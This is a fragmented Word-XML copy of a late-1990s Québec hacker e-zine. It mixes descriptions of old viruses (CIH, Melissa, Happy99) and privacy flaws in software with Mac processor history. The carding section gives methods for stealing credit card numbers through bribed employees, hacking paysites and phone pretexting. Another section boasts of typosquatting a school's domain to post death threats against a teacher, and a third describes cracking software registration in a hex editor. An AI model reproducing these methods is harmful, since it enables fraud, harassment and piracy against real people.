        <w:t>Les virus, par Clad Strif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Nanananan! Avant de se faire de grosses illusions du style que je vais vous donner les code sources de virus, sachez que je vais juste parler de son aspect technique et bien d'autres informations...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Un Virus est un programme susceptible d'entraîner des perturbations dans le fonctionnement d'un ordinateur en dénaturant ses programmes exécutables ou ses fichiers système. Il se transmet généralement par l'intermédiaire de disquettes ou encore par téléchargement. La plupart des virus informatiques ajoutent quelques lignes de commandes dans le fichier cible lorsqu'ils sont chargés en mémoire. Ces commandes ont généralement pour conséquence de ralentir ou d'empêcher l'exécution, voire de détruire certains fichiers. La seule manière de s'en prémunir efficacement consiste à tester toute nouvelle information insérée dans la machine au moyen d'un logiciel antivirus. Néanmoins, de nouveaux virus apparaissant chaque jour, ce logiciel se doit d'être le plus récent et le plus actualisé possible, sachant qu'il existe toujours un délai entre l'apparition d'un nouveau virus et l'élaboration de la parade. Actuellement, il existe de nombreux types de virus informatiques, toujours plus sournois et moins visibles. Un virus capable de se propager à travers des réseaux informatiques est parfois appelé ver, en particulier lorsqu'il se compose de plusieurs segments dispersés à travers le réseau. Un "cheval de Troie" est un dangereux virus se présentant sous la forme d'un programme utile, par référence au célèbre cheval de Troie de la mythologie grecque. En cours d'exécution, ce type de virus met en œuvre des actions destructrices à l'encontre du système, alors qu'il paraît accomplir une tâche totalement anodine. Un virus peut rester dans la mémoire de l'ordinateur, constituant dans ce cas un programme terminate-and-stay-resident (TSR) : on dit alors qu'il s'agit d'un virus résident mémoire. Il peut en outre être encrypté, rendant ainsi sa détection et sa résorption plus délicates. Enfin, il peut être polymorphe, évitant d'être décelé grâce à un changement interne de sa structure. Le Virus a un cycle de vie divisé en trois étapes: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L'éxécution:phase d'introduction du virus dans le systèm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La propagation:pendant laquelle le virus cherche à se multiplier le plus possibl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L'action: étape finale durant laquelle le virus met en oeuvre des fonctions de dommages perturbantes et/ou destructices. Durant les phases d'éxécution et de propagation,le virus cherchera à se faire le plus discret possible. La surprise n'en sera que plus grande lors de l'action destructrice finale. </w:t>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color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Portrait d'un tueur en Série: C I H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Nom Win95.CIH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Autres variantes Chernobyl, PE_CIH, WIN95, CIH 1.x, Win95.CIH, Win32/CIH,W95/CIH.1003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Taille 1 k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Fichier infecté .ex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Platefrome Windows 95 - windows 98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Mode d'infection résident mémoir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Date d'activation 26 du mois, 26 avril, 26 Juin (suivant version )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Dégât causé efface le disque dur et dans certains cas corruption du BIOS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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Versio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CIH 1.2 la plus répondue aussi connue sous le nom de Tchernobyl en référence a la date de son activation.. S'active le 26 avril..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CIH 1.3 date d'activation 26 juin (attention donc ).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CIH 1.4 date d'activation chaque 26 du mois pas très répondue mais la plus dangereus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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Origin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D'après les éditeurs d'antivirus il serait originaire de Taiwan.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29 avril 1999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D'après AP, un institut d'ingénieur à Taiwan a déclaré que virus CIH qui a frappé cette semaine les disques de millier de PC a été écrit par un de ses ancien étudiant, a rapporté l' Asoccited Press jeudi.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Le virus CIH, crée par Chen Ing-hau, a frappé les micro-ordinateurs de TIT ( Tatung Institut of Technology ) en avril 1998. Chen, majeur de sa promotion, a reçu un blâme mais n'a pas été exclu de l'institut, a déclaré le chargé des affaires estudiantines. L'institut ne l'a pas punit plus sévèrement car Chen a demandé aux étudiants de ne pas propager le virus.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Chen a terminé ses études en 1998 et actuellement il passe son service militaire de 2 ans.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Les initiales du virus CIH représentent les initiales de Chen (Chen Ing-hau ).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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Descriptio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CIH est un virus qui infecte les fichiers exécutables Windows. Quand un programme infecté est utilisé le virus s'installe en mémoire et infectera tout les fichiers ouverts et consultés (lors d'une exécution ou de la copie ). Il faut donc impérativement démarrer tous micro infecté à partir d'une diskette système non infecté avant de commencer la désinfection sinon le virus infecteras tous les fichiers scanné par un anti-virus.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Les fichiers infecté ont la même taille que les fichiers originaux grâce au mode unique d'infection du CIH. Le virus scanne le fichier avant de l'infecter pour détecter les espaces non utilisé et se divise alors en plusieurs morceaux qui vont se cacher dans l'espace inutilisé. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Chaque 26 du mois, ou comme pour la variante Tchernobyl le 26 avril, le programme entre dans sa phase destructive qui est devisé en deux parties : Le Virus va d'abord essayer de modifier et de corrompre le BIOS. Certains type de BIOS Flash seulement sont affecté. En corrompant le BIOS qui sert à initialiser et gérer les entrées sorties des périphériques, il empêche ainsi le PC de démarrer lorsqu'on le met sous tension. La seconde phase et la plus destructive pour vos données consiste à écrire sur le premier 1 MO de votre disque des données aléatoire ce qui entraine la perte des données du disque dur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720"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20"/>
          <w:tab w:val="left" w:pos="1440" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>UN VIRUS A METTRE EN QUARANTAINE: MELISSA</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Depuis vendredi dernier, de nombreuses sociétés américaines (dont l'Empire) ont été contraintes à couper leurs serveurs de messagerie électronique. La raison? Un simple virus baptisé Melissa qui utilise le couple Word-Outlook pour se propager à la vitesse de la lumièr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Tout commence par un anodin courrier électronique titré "Important message from..." contenant uniquement un document word en pièce jointe. En ouvrant le fichier, l'utilisateur qui n'est pas protégé contre Melissa engendre automatiquement l'envoi de 50 e-mails identiques à celui qu'il a reçu aux 50 premières personnes figurant dans son carnet d'adresses. Une bonne surprise pour tous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Les effets du virus ne sont pas très dangereux en eux-mêmes. Melissa se contente d'insérer des citations extraites de la série "Les Simpsons" lorsque le nombre de minutes affichées par l'horloge est égal au jour du mois (aujourd'hui 30 mars, c'est à 8h30, 14h30 ou encore 18h30 qu'il se déclenchera). En parallèle, le virus réduit les paramètres de sécurité Internet de Windows à leur plus bas niveau. Rien de grave en soi, les données des utilisateurs ne sont normalement pas touchées.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Mais le virus, en se répandant toujours plus, utilise les ressources de bande passante des entreprises et des fournisseurs d'accès à Internet.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En attendant, la plupart des sociétés infectées ont interdit l'expédition de messages extérieurs. Trend-Micro a déjà posté un anti-Melissa sur son site et les administrateurs de réseaux chassent actuellement la petite bête sur leurs machines mais sont contraints de réajuster les paramètres de sécurité manuellement sur toutes les machines infectées. L'ensemble des éditeurs d'anti-virus devraient poster très rapidement une mise à jour de leur logiciels sur leurs sites web.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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">En espérant que certains petits malins ne vont pas adapter Melissa à leur sauce et ne lui donnent des capacités plus destructrices... </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="72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440" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">HAPPY99: C'EST PAS LA JOI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Ce virus se manifeste depuis quelques mois dans le courrier électronique. Le fichier HAPPY99.EXE est attaché à un courrier et s'il est exécuté, il affichera sur l'écran un feu d'artifice… pendant qu'il profite de cette diversion pour aller inscrire 3 fichiers pirates dans votre dossier WINDOWS. Ces fichiers seront activés chaque fois que vous enverrez un courrier en y attachant, à votre insu, le fameux fichier HAPPY99.EXE. Sans le savoir, vous venez de polluer l'ordinateur de votre destinataire si celui-ci exécute le fichier attaché.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HAPPY99.EXE ne détruit aucun fichier sur l'ordinateur… il n'est donc pas trop méchant. Il vise tout simplement à se propager sur tous les ordinateurs de la planète pour finir par créer un embouteillage monstre sur le Web. Ce qui est particulièrement vicieux c'est que celui qui en est atteint ne le sait même pas et qu'il continue ainsi à contaminer les autres à son insu…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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour vérifier si HAPPY99.EXE a élu domicile sur son ordinateur, on doit aller dans le dossier WINDOWS pour rechercher si l'un des 3 fichiers suivants s'y retrouve : ska.exe, ska.dll ou Wsock32.ska. Si c'est le cas, il existe une procédure pour éradiquer le virus car il n'est pas suffisant de supprimer seulement les 3 fichiers pirates.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_______________</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3.11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les mouchar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nonymes sur le www (World Wide Web)? Pas si sur! Voyez par vous même sur le site du cnil http://www.cnil.fr, ou lisez cette article... Eh oui! Vous vous croyez tranquilous derrière votre écran, mais il existe des moyens de surveillance... Prenons un exemple REEL: une personne suspectée de piratage informatique sera surveillée et sera "fichée"... ça peut aller jusqu'à vous traquer: savoir quand-est-ce que vous vous connectez... Mais comme on peut pas surveiller la moitié de la planète... En général vous risquez pas grand chose... Sauf si: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Vous avez Shockwave7. Il y avait une faille dans ce logiciel que les éditeurs ont corrigé. Cette faille permettait de récupérer les mots de passe et les données personnelles des intrenautes. Pour voir les pages animées par Shockwave, on devait télécharger un plug-in qui normalement devait s'installer sur le navi. Au départ le plug-in devait envoyer à l'éditeur les données liées aux sites visités. Mais dans d'autre cas il était possible de récupérer les mots de passes d'accès des sites!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Vous avez MSIE5 (Microsoft Internet Explorer 5). Celui-ci envoie des infos aux serveurs des sites qu'on inscrit dans nos signets. Et en plus c'ets pas un bug, c'est une fonctionnalité voulue, elle permet aux administrateurs de sites d'insérer leur logo à côté de leur nom dans la liste. Ca permettrait à certaines sociétés de remplir leurs bases de données de multi-informations concernant leurs visiteurs. Le pire est qu'on ne peut actuellement RIEN faire. Mais en se procurant le proxy des Junkbusters (&lt;http://www.junkbusters.com&gt;), ils pourront placer une ligne /favicon.ico dans le fichier de filtres et régler le problème.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Vous utilisez SmartCenter (de Netscape!!!). On regarde ou vous vous déplacez pour vos recherches. Mais là c'est déjà moins un secret, et on est au courant de l'endroit ou transitent les requêtes.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Vous avez le Minitel. Le minitel possède aussi (au moment ou l'on parle du PentiumIII justement) une puce numérotée...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Vous utilisez Netscape Communicator. Un bug dans le navigateur Netscape Communicator serait responsable d'une faille de sécurité susceptible de trahir les internautes surfant anonymement sur le web grâce à des services comme Anonymizer.com. Ces derniers sont en effet capables de désactiver les scripts contenus dans les pages visitées, afin d'empêcher un site web d'insérer des cookies ou de prendre connaissance de certaines données sur l'internaute en vadrouille. Or, avec Netscape Communicator, des commandes Javascript insérées dans les champs texte des formulaires permettent de passer outre la protection offerte par des services comme Anonymizer.com. Anonymizer.com devrait proposer dans les prochains jours un correctif à ses utilisateurs utilisant Communicator. En attendant, il leur est conseillé de désactiver Javascript dans le menu de configuration du navigateur.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Vous avez Windows98. Microsoft vient de proposer un programme permettant d'éliminer le GUI, le numéro unique qui marque votre disque dur et tous les documents que vous produisez si vous avez installé Windows 98 (voir HNT-Mag by mail n°9). Les utilisateurs de Windows 98 peuvent télécharger ce programme à partir du module Windows Update (Menu Démarrer, puis Paramètres), les autres pouvant le trouver sur le site de Microsoft. L'actualité récente a démontré la redoutable efficacité de ce mouchard, puisqu'il est un des éléments qui ont permis au FBI de retrouver le père présumé du virus Melissa (voir HNT-Mag by mail n°12) en quelques jours seulement. Or si l'on peut admettre que son utilisation soit dans un tel cas justifiée, il est cependant impossible de garantir que le GUI ne puisse être employé dans des dessins plus obscurs. Sa détection pourrait ainsi être facilement incluse dans des programmes de hacking "pré-mâchés" tels qu'il en circule abondamment, et il suffirait alors d'une intrusion réussie chez Microsoft pour donner accès aux noms des utilisateurs et autres renseignements correspondants à chaque GUI. C'est en cela qu'il constitue une menace sérieuse pour la vie privée...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Vous utilisez Lotus Notes 4.5 et 4.6. Lotus a confirmé l'existence d'un bug compromettant la confidentialité du courrier électronique dans son logiciel de messagerie Notes. Selon le magazine en ligne CNet, qui rapporte l'information, ce bug rend lisibles des mails censés être cryptés. Il affecte les versions Ltus Notes 4.5 et 4.6. On n'oublie pas que le gouvernement suédois a découvert que le système de cryptage Lotus Notes comporte une faille destinée à être exploitée par les services secrets américains pour espionner les entreprises européennes. Bugs involontaires???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color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Vous utilisez Real ou Media Player. Lorsque vous vous enregistrez en ligne pour utiliser l'un des logiciels, des informations à votre propos sont immédiatement transférées chez les éditeurs (RealNetworks ou Kro). des informations telles que le type de brouteur utilisé, la dernière page visitée, sont collectées et votre activité enregistrée lorsque vous l'utilisez.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__________________________________________________</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3.12 Carding: Truc divers pour se trouver des cc#, par Dukest4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 Premier truc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> le plus simple: connaitre qqn qui travail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ans uen station service ou un depanneur ou wathever d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enre... pi lui tu y demande soit de poser une tite camer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qpart qu'y vise sur les cc# quand le monde viennent po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yer... et la t sur d'en avoir en esti!! ou bin tu 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mande de tout simplement les prendre en not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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deuxieme truc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>: tu trouve un site comme playboy.com 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importe qu'elle site de cul qui charge pour etre memb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t la t'essaye d'avoir un access root... ca c'est un pe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lus compliqué mais une fois que tu la tu n'a qu'a changé</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 e-mail d'envoie des enregistrement a ton e-mail et l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u recoit plein plein de # de carte de cred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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Troisieme Truc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>: vous chercher dans le bottin téléphoniq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t trouvé un nom et # de telephone et la vous appeller l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ersonne en demande le nom de cette personne la, ensui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us lui dite que vous etes la compagnie de teleph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e donne un exemple simple mais qu'y marche) et vous lu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ue vous voulez avoir son # de carte de credit car vo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aire certaine verification de securité sur certa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tilisateur du services ou WATHEVER mais debrouille to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ur avoir son esti de cc# :)) la plus part du temps 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nde veullent mais la le mieux c'est de faire ca a parti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un telephone publique pcq si ils ont un afficheur ou s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ls appeller Bell Canada quand ils vont voir que leur arg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minue Belle vont voir d'ou l'appelle etais venu... don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est toujours mieux d'a partir d'un telephone publiq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ukest4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__________________________________________________</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3.13 Un de mes truc préféré pour faire chier N'IMPORTE QU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k j'va vous donner un truc pas rapport au hacking ou meme a l'anarch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ellement mais un truc vraiment pratique... en fait cer un mix ent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 carding ou l'anarchy heheh... ok ya un prof qu'y te fait chi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va t'expliquer ske j'ai faite quand mon prof de gym ma faite chi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vans toute la classe quand j'tai en secondaire 3 pi tu va comprend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allait a Regina Assumpta une college privé a Montréal a s'te mo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a pi j'ai commencé en me cardant www.reginaassumpta.com (leur vra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ite est reginaassumpta.qc.ca) donc tlm en premier lieu ecriva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ginaassumpta.com par reflexe d'ecrire tjs .com... ce site a été</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isité par toute les direction d'ecole privé du Quebec ou presq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ur ce site j'avait mit la page reel du vrai site saufe que j'ava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it toute les links vers www.pmanning.com un site crée contre m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ofesseur de gym (son nom s'est Mr.Manning mais comme il ha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eston Manning tlm l'appellait dememe alors j'ai faite pmanning.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t dessus j'y ait faite des menaces de morts et des envoyage chi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ute l'ecole a fini par voir le site! Ou presque... toute le secondai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4-5 quasiment! Donc Mr Manning a pogné une mechante debarque da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stime de l'ecole... et il a été refuser ou il etais sensé all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pres son remplacement (il etais la que pour une 1/2 année) donc perd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a job grace a moi... et aussi (ca j'ai jamais compris c'est pas logiq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is a cause du site il a perdu sa femme sous decouragement en pl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lm qui l'adorai a la fin doutait bcp de lui!! Donc ok en 1 mois j'a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ussit a fuker la vie d'un prof carrément... saufe que le proble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est qu'un de mes ex-amis a été temoigner contre moi a la dire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l avait été pamal forcé par la direction) et j'ai été renvoyer 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cole et presque eu une saisie de mon materiel informatique... (ma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a cer une grosse histoire pi shu pas ici ppour compter ma vie me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i cer ca que je fait depuis le debut) hehheh mais en totu cas j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ulais justement quitter cette ecole pi j'ai reussit a detruire l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ie d'un prof qu'y ma faite chier! donc toute etais parfa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a la semaine passé j'ai faite biIIclinton.com (pcq billclinton.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xiste deja alors j'ai faite bi I I clinton.com (i majuscule) lolo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k... lui j'lai pas fini par exemple... st-maxime.com va suivre biento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i toute le monde qu'y me font chier aussi! j'vous jure! un .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a a de l'influence en sacrement!!! mais 1- fait le pas devans person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u'y va pouvoir temoigner contre toi... pi 2- oublie pas les n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registrer... j'veut dire les compagnies qu'y sont enregistr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i tu te fait pogner cer surtout ca qu'y va te couter cher... vol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 droit d'auteur!! bon bin bon card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ukest4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_______________________________________</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3.13 Quelques Techniques sur le cracking en HE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emierement je vous averti ce text n'est pas pour les grand bolé j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ais tout simplement expliquer la base du language et le comment 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anguage hex fonctionne et a partie de ca vous aller surment pouvoi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ussir a cracker certaine affaires... premierement pour comprend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n peu ce que tu voit dans le hex sa marche par loop comme tu l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urment remarquer deja, s'est souvent des repetitions de plusieu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is le meme code, exemple beaucoup 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0000 0000 0000 0000 0000 c'est tout simplement ce qui sert a fai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ntinuer le programme... quand admettons tu a un popup qu'y s'ouv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t te demande le registration # (par exemple) tu trouve l'endro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u'y demande ca... les popups sont souvent evident avec une part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u text dans la section qu'y montre le text tu n'a qu'a coupé</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a parti qu'y le fait looper sur ce popup ou tout simplement effacé</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 popup... ou il y a des programme plus simple pour faire ca gen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u'y montre toute les popups du programme et la tu peut les chang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mme tu veut... le hex c'est tellement puissant :)) Pour les jeu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mo que tu veut la vrai version aussi s'est pareille... tu do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tiliser le data de la vrai version et y enlever soir les vide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u wathever et le faire faire oublier les video et que c'est u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mo s'est aussi simple... saufe que le compliqué la dedans c'e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 trouvé les places ou est inscrit ce que tu veut editer... moi j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e conseille Hex Workshop (j'me souvient pu ou le trouver sur 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et) mais celui la c'est une simple et pratique... il y a auss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urce Code Manager que jaime bien... c'est a vous de juger ave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quel vous etes mieux pour travailler :) Le text un peu plus lisi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ans le coté tu peut te situer un peu avec ca... et la c,est a to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 faire des centaine de test pour relooper un loop ailleur! Fa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ujour un backup de ce que tu edit... pi aussi un conseille deme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uand ya un prog faite en VB ou n'importe kelle text files ave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n pass ou genre des files html ou n'importe koi kier pas compress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u peut le lire avec le hex fake sa peut surment t'aider bc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i d'autre moyen aussi pour cracker c'est de trouvé le ID d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alogue que tu veut editer ou enlever ou looper par dessus com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r exemple un dialogue qui demande le Registration # et ensui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ue ta trouver le ID tu n'a qu'a le convertir en HEX soit avec l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lculatrice ou avec le programme lui meme s'il le permet, pi u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is en HEX code tu n'a qu'a le searcher dans le program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tention s'est pas necessairement ce que tu va trouvé... tu do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aire des tests et des tests avant de le trouver ca sa peut et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ong aussi si le ID en hex a 3 ou wathever 5, 7 caracter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niquement tu doit toujours le mettre a 2, 4, 6 caracteres po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ue sa marche... car sa fonctionne en blocs... 2 bloc du hex = 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ytes... un autre truc pour retrouver ce que tu cherche dans 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ogramme si tu ne l'a jamais trouvé utilise un deboguer... ave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 tu peut stopper le programme que tu load et automatiquement voi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u il est rendu a lire dans le Hex Code... c'est pamal pratique c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enre quand metton un jeux load sur un cd pi tu veut qu'y load da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ordi sur un tel endroit eh bien sa peut etre pratiq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 t k check ca comme faut c hot en chien le hex! j'va sur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crire un autre article dans le prochain zine plus professionne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ur dotre technique plus evoluer pour cracker... bin voil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espere t'avoir encourager a utiliser c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_________________________________</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3.14 Les processeurs Mac du debut a 199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ans cet article je vais vous parler des processeurs Mac depuis les débuts de la compagnie Ap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usqu'en 1996, année ou j'ai cesser de m'interresser au suj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trodu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ut ordinateur est équipé d'au moins un microprocesseur ou puce ou encore chip en anglais. L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emiere generation de Mac (1984-1994) utilisait les processeurs de type Cisc de la gamme 680X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 Motorola. Depuis 1994, deux vague de Power Macintosh ont déjà déferlé sur nos bureaux et da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s maisons embarque une technologie différente : les processeurs Risc PowerP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isc et Ris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e cisc ou "Complex Instruction Set Computer" était la technologie présente au couer de tous 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c équipés des processeurs de la famille des 68000. C'est elle aussi qu'a promue Intel (jusqu'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997 je crois) au travers de sa ligne X86 et meme Pentium (qui emprunte certain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ractéristiques des processeurs Risc). L'évolution en puissance de la technologie Cis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mplique la réalisation de processeur de plus en plus complexex, gros et couteux. Monter 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uissance devient donc de plus en plus difficile et cher. c'est pourquoi IBM, puis quelqu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abricants de stations de travail, notamment Sun, se sont lancés dans les années 80 dans u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utre voie : le Risc ou "Reduced Instruction Set Computer". C'est dans cette alternative q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inscrit la famille PowerPC, qui hérite des travaux d'IBM sur le jeu des compasants Power qu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équipait ses premieres stations de travail RS/6000. Comme son nom est censé l'indiquer,u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ocesseur Risc est construit pour fonctionner sur la base d'un nombre limité d'instru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 truc? statistiquement, ces instruction sont celles qui sont executées le plus souv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 plus, le processeru les traitre a tres grande vitesse : au moins une par cycle d'horlo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rfois plus. Le PowerPC 620 s'annoce capable d'en traiter six par cycle. Pour atteindre cet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dence, le processeur Risc utilise entre autres, la méthode du travail a la chaine. En fait, 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ransforme toutes  les instruction complexes en un grand nombre d'instructions simples, qu'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raite très, très vite. Mais l'efficacitédes processeurs Risc repose, bien plsu que celle d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ocesseurs Cisc, sur le niveau d'optimisation des applications et la qualité des compilateu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ui traduisent les languages evolués en code directement assimilable par le processe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réquence d'horlo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a vitesse d'un microprocesseur s'exprime en millions de cycles d'horloges par secondes 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égahertz (MHz). L'horloge n'est rien de moins qu'un circuit électronique qui envoie des "top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égulier au processeur. Ils servent a synchroniser ses differentes activités. L'execution d'u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struction requiert au moins un cycle d'horloge : si elle se termine avant la fin du cycle, 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ocesseur doit attendre. La rapidité de votre ordinateur est donc étroitement liée à l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réquence d'horloge de vote processeur. Ainsi, le Mac Lc et LC II (16 MHz, chaque cycle du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2 milliardiemes de secondes) vont grosso modo 2 fois plus vite qu'un Classic (8MHz). À parti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 16MHz, ca se complique : les Ram, trop lentes, ne suivent pas la cadence d'horloge. On don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arfois 2 vitesses d'horloge : interne et externe. Par exemple : Performa 630 66/33 MHz. L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emiere -la plus élevé- est celle a laquelle le processeur travaille réellement. La secon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rrespond a la vitesse d'échange d'informations entre le processeur et la memoire. Les nouveau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ocesseurs sont en réalité tellement rapide que le bus (le circuit de transfert) ne suit pl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était déjà le cas avec les 68040 du Quadra 700 par exemple, dont les frequences internes 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xternes sont de 50 et 25 MHz, respectivement. C'est encore plus vrai avec le Performa 5300 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300 par exemple, dont le processeur carbure à 100 MHz, alors que la carte logique ne fonction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u'a 40 MHz. Les processeurs ne sont pas usinés pour travailler a une cadence d'horloge fix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 fait, ils peuvent travailler à un rythme plus élevé que celui pour lequel le fabricant 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ertifie. D'ou l'apparition sur le marché de l'overcloak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dress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s informations qui arrivent au processeur sont tres ordonnés : elles se placent dans des cas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u adresses. Le processeur 68000 de Motorola, par exemple, fonctionne avec un adressage de 24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its. Ce qui signifie qu'il existe 224, soit 16 777 216 adresse capables de contenir chacune u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ctet. Le processeur 24 bits "adresse" donc potentiellement 16 Mo. Dans ces 16 Mo, 8 seule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ront reservés a la RAM. Le reste se distribue entre la ROM, les periphériques et les adres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uBus. Les processeurs 68020, 030, 040 et PowerPC s'adressent quant a eux sur 32 bits. Si vo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sseder un Mac 68020, 030 ou 040, verifier bien que l'adressage 32 bits est selectionner da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 tableau de bord Memoire. Sur un Power Mac, l'adressage est automatiquement sur 32 bi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nité de calcul en virgule flottan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ur gagner en efficacité, le processeur "sous-traite" l'exécution de certaines instruction a u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nité de calcul en virgule flottante. Si le processeur porte le doux nom de CPU, le coprocesse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appelle FPU car il se charge surtout des calculs sur les nombres flottants. Il accel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ertaines fonctions des tableurs, bases de donnés, programme graphiques et vectoriel. Sur Ma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s coprocesseurs arithmétiques 68881 et 68882 completent les CPU 68020 ou 68030. Un équival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u 68882 est integré au 68040. En revanche, le 68LC040 est depourvue de cette unité. Tous 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ocesseurs PowerPC integrent également ce type d'unité de calcul, mais les logiciels n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ptimisés sont incapables de l'exploiter. Certains logiciels refusent de fonctionner s'i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e detectent pas de FPU. Or, comme nus venons de le dire, ces petites betes n'équipent pas to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s mac. D'où l'utilité d'un logiciel comme SoftwareFPU : il simule la presence d'un coprocesse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Mais non l'ensemble des fonctions habituelles. SoftwareFPU est un shareware disponible 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ersion 680x0 ou optimisé PowerPC. N'hésiter pas a l'utiliser si votre Mac est depourvue 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processeur physique ou si la FPU n'est pas reconnue. Il existe aussi une version commercia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 SoftwareFPU, plus sophistiquée dans les options de parametrag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ubus et PC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e bus n'est pas directement lié au processeur mais s'avere pour certains utilisateurs un el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ssentiel de choix puisque qu'il conditionne l'architecture generale de l'unité centrale et s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ossibilités d'extension. Le bus assure en effet la communication entre le processeur et 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es d'extensions ou de traitement. La plupart des utilisateurs n'ont que faire d'un tel b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s Mac integrant en standart de nombreuses fonctions. Mais les professionels, notamment dans l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O, le traitement d'images, le multimédia ou les reseaux(serveurs) ont besoin eux, de machin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xtensibles. Le bus est alors déterminant. Depuis l'apparition des Mac modulaires avec la lig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cintosh II, le bus était de type NuBus. Un choix innovant a l'époque. NuBus s'averait n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ulement performant mais aussi plug and play! Hélas, seul Apple implenta ce bus sur des machin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ut public...Les cartes NuBus (graphiques, réseau, RAID...) resterent donc toujours plus c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que leur equivalents dans le monde PC ou les micro-ordinateurs disposait d'un bus pl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udimentaire (AT puis ISA...). Le temps faisant son oeuvre, les processeurs decuplant leu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uissance de traitement, les applications devenant plus exigeante, le NuBus devint un goulo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tranglement. Il fallait qu'Apple change de technologie. Apres avoir ete tenté de definir u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uveau bus "propriaitaire", le constructeur s'est finalement rallié a un recent standart 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ndustrie: PCI, Cette architecture est non seulement plus puissante que le NuBus, toujou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lug and play mais, surtout, utilisé par tout les fabricants de micro-ordinateurs PC. Le marché</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st donc bien plus ouvert et les carte PCI qui seront proposer aux utilisateurs Mac sans dou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ins cher qu'en version NuBus. Apple a fait le choix, avec la nouvelle generation de Pow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cintosh 97200, 7500, 8500 et 9500), du tou PCI. Cela pose du coup plusieurs probleme au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tilisateurs qui sont confrontés aux investissement passés en carte NuBus (carte parfois pl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here que l'unité centrale!) et aux bogues du Systeme 7.5.2. Power Computing, l'un des gran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abricants de compatibles, propose quand a lui sur sa nouvelle ligne PowerWave, la possibilité</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 mixer NuBus et PCI, grace a un composant specifique qui gere les debits differents des 2 b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fin de ne pas degrader les performances du PC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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>£c0nfuz3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ab/>
        <w:tab/>
        <w:tab/>
        <w:t>[HaCkEr FrOm ThE PuNk PlAn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Conclu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Eh oui c,est fini pour le zine #3... j'espere que celui ci aura des meilleurs remarq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que les deux autres... faut dire aussi que nous ne fesons que commencer a ecri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des zines... il y a un debut a tout alors svp arretter de chialer pi d'nous envoy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romener (pour certain) et aidez nous plutot en nous disant quoi ameliorer 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quoi apporter dans le zine... Merc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b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>QHA, Québec Hacker's Alliance - http//www.q-h-a.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:u w:val="singl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